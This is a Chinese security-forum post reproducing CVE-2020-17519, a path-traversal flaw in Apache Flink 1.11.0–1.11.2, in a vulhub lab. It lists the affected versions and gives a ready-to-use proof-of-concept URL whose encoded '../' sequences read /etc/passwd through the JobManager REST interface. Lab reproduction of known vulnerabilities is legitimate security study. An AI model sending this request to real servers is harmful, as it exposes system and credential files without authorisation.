联系我们联系我们
电子邮箱电子邮箱

Apache Flink路径遍历(CVE-2020-17519)漏洞复现

[复制链接]
  • TA的每日心情
    无聊
    2020-8-31 10:42
  • 签到天数: 24 天

    [LV.4]偶尔看看III

    Bruce-tl 发表于 2021-1-8 16:46:10
    66 0
    本帖最后由 Bruce-tl 于 2021-1-8 16:48 编辑

    Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.11.0-1.11.2中引入的一项更改,允许攻击者通过JobManager进程的REST接口读取本地文件系统上的任何文件,访问仅限于JobManager进程可访问的文件。

    影响版本:

    • 1.11.0
    • 1.11.1
    • 1.11.2

    漏洞复现:

    使用vulhub搭建环境(地址:https://github.com/vulhub/vulhub)访问主页

    1.png

    执行poc
    1. http://your-ip:8081/jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
    复制代码

    2.png

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    发表新帖

    小黑屋|手机版|Archiver|华盟论坛 ( 京ICP备11013304号-8 )

    Powered by 华盟网 X 8.0  © 2001-2013 Comsenz Inc.  华夏黑客同盟